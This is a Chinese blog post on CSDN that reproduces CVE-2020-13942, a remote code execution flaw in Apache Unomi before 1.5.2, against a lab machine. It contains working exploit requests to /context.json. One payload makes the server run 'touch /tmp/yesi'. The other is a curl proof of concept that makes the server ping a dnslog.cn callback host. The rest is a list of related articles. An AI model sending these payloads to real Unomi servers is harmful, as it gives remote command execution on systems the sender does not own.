Apache Unomi远程命令执行漏洞-CVE-2020-13942

最新推荐文章于 2024-09-02 09:51:15 发布
最新推荐文章于 2024-09-02 09:51:15 发布
阅读量190 收藏
点赞数
分类专栏: 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44912035/article/details/112000538
版权

漏洞详情:

Apache Unomi是一个Java开源客户数据平台,是用来管理客户和访问者的数据,并个性化客户体验。由于Apache Unomi允许远程攻击者使用包含任意类的MVEL和OGNL表达式发送恶意请求,最终可导致攻击者使用Unomi应用程序权限远程执行代码。

影响版本

Apache Unomi < 1.5.2

漏洞复现

访问页面如图所示:
在这里插入图片描述
构造如下请求包
在这里插入图片描述
数据包内容
POST /context.json HTTP/1.1
Host: 192.168.174.158:9443
Accept-Encoding: gzip, deflate
Accept: /
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36
Connection: close
Content-Type: application/json
Content-Length: 250

{
“filters”: [
{
“id”: “sample”,
“filters”: [
{
“condition”: {
“parameterValues”: {
“”: “script::Runtime r = Runtime.getRuntime(); r.exec(“touch /tmp/yesi”);”
},
“type”: “profilePropertyCondition”
}
}
]
}
],
“sessionId”: “sample”
}

进入靶机查看文件成功创建

在这里插入图片描述

测试2

在这里插入图片描述

测试成功出网

在这里插入图片描述
poc:
curl -X POST https://192.168.174.158:9443/context.json?sessionId=1234 -k --header ‘Content-type: application/json’ --data ‘{“filters”:[{“id”:"test2 ",“filters”:[{“condition”:{“parameterValues”:{“propertyName”:“prop”,“comparisonOperator”:“equals”,“propertyValue”:“script::Runtime r=Runtime.getRuntime();r.exec(“ping xxxx.dnslog.cn”);”},“type”:“profilePropertyCondition”}}]}],“sessionId”:“test2”}’

在这里插入图片描述
在这里插入图片描述

weixin_44912035
关注
专栏目录
Apache Unomi 远程代码执行漏洞复现(CVE-2020-13942)
doctor__的博客
07-20 466
目录漏洞信息环境搭建漏洞复现通过Python脚本执行getshell操作修复建议 漏洞信息 项目 Value 漏洞名称 Apache Unomi远程代码执行漏洞 漏洞编号 CVE-2020-13942 危害等级 高危 CVSS评分 7.2 漏洞厂商 Apache 受影响版本 Apache Unomi<1.5.2 漏洞概述 Apache Unomi 是一个基于标准的客户数据平台(CDP,Customer Data Platform),用于管理在线客户和访客等信息,
Apache Unomi远程命令执行漏洞CVE-2020-13942
jammny
11-26 1108
Apache Unomi远程命令执行漏洞CVE-2020-13942漏洞详情: Apache Unomi是一个Java开源客户数据平台,是用来管理客户和访问者的数据,并个性化客户体验。由于Apache Unomi允许远程攻击者使用包含任意类的MVEL和OGNL表达式发送恶意请求,最终可导致攻击者使用Unomi应用程序权限远程执行代码。 影响版本: Apache Unomi < 1.5.2 漏洞分析: Unomi依赖于诸如OGNL或MVEL之类的表达式语言在1.5.1之前的版本中,攻.
Apache Unomi 远程代码执行漏洞 (CVE -2020-13942)
小小猪的博客
12-28 523
Apache Unomi 远程代码执行漏洞 (CVE -2020-13942) 漏洞描述: Apache Unomi是一个Java开源客户数据平台,这是一个Java服务器,旨在管理客户,潜在顾客和访问者的数据,并帮助个性化客户体验。Unomi可用于在非常不同的系统(例如CMS,CRM,问题跟踪器,本机移动应用程序等)中集成个性化和配置文件管理。在Apache Unomi 1.5.1版本之前,攻击者可以通过精心构造的MVEL或ONGl表达式来发送恶意请求,使得Unomi服务器执行任意代码,漏洞对应编号为C
推荐使用Apache Unomi Tracker:智能的数据追踪与分析利器
gitblog_00064的博客
08-06 359
推荐使用Apache Unomi Tracker:智能的数据追踪与分析利器 unomi-trackerApache unomi项目地址:https://gitcode.com/gh_mirrors/un/unomi-tracker 1、项目介绍 Apache Unomi Tracker是一个专为Web应用程序设计的JavaScript库,它允许开发者轻松地收集、管理和分析用户行为数据。这个开源项...
Apache Unomi 远程表达式代码执行漏洞CVE-2020-13942
黑白的博客
05-02 359
声明 好好学习,天天向上 漏洞描述 Apache Unomi是一个Java开源客户数据平台,这是一个Java服务器,旨在管理客户,潜在顾客和访问者的数据,并帮助个性化客户体验。Unomi可用于在非常不同的系统(例如CMS,CRM,问题跟踪器,本机移动应用程序等)中集成个性化和配置文件管理。 在Apache Unomi 1.5.1版本之前,攻击者可以通过精心构造的MVEL或ONGl表达式来发送恶意请求,使得Unomi服务器执行任意代码,漏洞对应编号为CVE-2020-11975,而CVE-2020-13942
Unomi 成为 Apache 软件基金会顶级项目
cpongo5
04-07 295
开发四年只会写业务代码,分布式高并发都不会还做程序员? >>> 3 月 21 日,Apache 软件...
CVE-2020-13942 Apache Unomi 远程代码执行漏洞复现
m0_56642842的博客
08-31 277
0x00 简介 Apache Unomi 是一个基于标准的客户数据平台(CDP,Customer Data Platform),用于管理在线客户和访客等信息,以提供符合访客隐私规则的个性化体验,比如 GDPR 和“不跟踪”偏好设置。其最初于 Jahia 开发,2015 年 10 月提交给了 Apache 孵化器。Apache Unomi 具有隐私管理、用户/事件/目标跟踪、报告、访客资料管理、细分、角色、A/B 测试等功能,它可以作为:Web CMS 个性化服务、原生移动应用的分析服务、具有分段功能的集中配
Apache Unomi 远程代码执行漏洞CVE-2020-13942)复现
玄道的网安博客
01-21 673
漏洞描述 Apache Unomi是一个Java开源客户数据平台,这是一个Java服务器,旨在管理客户,潜在顾客和访问者的数据,并帮助个性化客户体验。Unomi可用于在非常不同的系统(例如CMS,CRM,问题跟踪器,本机移动应用程序等)中集成个性化和配置文件管理。 Apache Unomi允许远程攻击者使用可能包含任意类的MVEL和OGNL表达式发送恶意请求,从而产生具有Unomi应用程序特权的远程代码执行(RCE)。目前互联网上已经公布漏洞利用相关POC,建议相关用户及时进行资产自查。 影响..
Apache Unomi 远程代码执行漏洞(CVE-2020-13942)复现
ximo的博客
03-24 259
简介 Druid 是一个分布式的、支持实时多维 OLAP 分析的数据处理系统。它既支持高速的数据实时摄入处理,也支持实时且灵活的多维数据分析查询。因此 Druid 最常用的场景就是大数据背景下、灵活快速的多维 OLAP 分析。 另外,Druid 还有一个关键的特点:它支持根据时间戳对数据进行预聚合摄入和聚合分析,因此也有用户经常在有时序数据处理分析的场景中用到它。 漏洞描述 在Druid 0.20.0及更早版本中,经过身份验证的用户可以发送特制请求,以强制Druid为该请求运行用户提供的JavaScript
探索个性化用户体验的利器 —— Apache Unomi
gitblog_00096的博客
06-08 386
探索个性化用户体验的利器 —— Apache Unomi unomiApache Unomi项目地址:https://gitcode.com/gh_mirrors/un/unomi 在当今数据驱动的时代,用户的每一次点击都蕴藏着巨大的价值,个性化的体验已成为企业竞争的新高地。今天,我们要向您隆重推荐一款开源神器——Apache Unomi,它如同一位幕后英雄,在A/B测试和个性化推荐中默默支撑,...
unomi-site:Apache Unomi网站
05-13
Apache Unomi网站源存储库 该项目包含Apache Unomi网站。 该网站是使用Maven过滤(针对版本号)生成的,然后传递给Jenkins以使用模板构建页面。 建造 您需要一台安装了Maven的机器来构建网站。 查看: git clone https://github.com/apache/unomi-site 运行构建: mvn clean install 生成的站点将位于target / generation-jekyll中 发布 要将本地网站发布到生产位置( ),您必须使用: mvn clean install scm-publish:publish-scm -Dusername=YOUR_APACHE_USERNAME -Dpassword=YOUR_APACHE_PASSWORD 生成jekyll网站 mvn clean install install
Apache Unomi 远程表达式代码执行漏洞(CVE-2020-13942)
weixin_44047654的博客
10-24 264
Apache Unomi 远程表达式代码执行漏洞(CVE-2020-13942)
Apache Unomi 远程代码执行
天行健,君子以自强不息
05-11 215
除非我不想赢,否则没有人能让我输!
推荐文章:探索个性化体验的利器 —— Apache Unomi
最新发布
gitblog_00636的博客
09-02 580
推荐文章:探索个性化体验的利器 —— Apache Unomi unomiUnomi 是一个开源的个性化推荐引擎,用于构建个性化推荐系统。它提供了推荐引擎的核心功能,如数据收集、数据处理、推荐算法和推荐结果展示等。这个项目可以帮助开发者快速构建个性化推荐系统,提高用户体验和满意度。项目地址:https://gitcode.com/gh_mirrors/uno/unomi 在当今这个数据驱动的时代...
漏洞复现----37、Apache Unomi 远程代码执行漏洞 (CVE-2020-13942)
七天
06-29 1063
CVE-2020-11975&CVE-2020-13942漏洞
Apache软件基金会宣布Apache Unom成为顶级项目
测试0901-1
02-16 389
导读:2019年3月21日,Apache软件基金会(ASF)宣布,Apache®Unomi™成为顶级项目(TLP)。Apache Unomi是一个标准的客户数据平台(CDP),它管理在线客户、线索和访客信息,以提供符合GDPR和“Do Not Track”偏好设置等访问者隐私规则的个性化体验。该项目最初在Jahia开发,并于2015年10月提交给Apache孵化器。\n正文\n这是一个Al-Mon...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值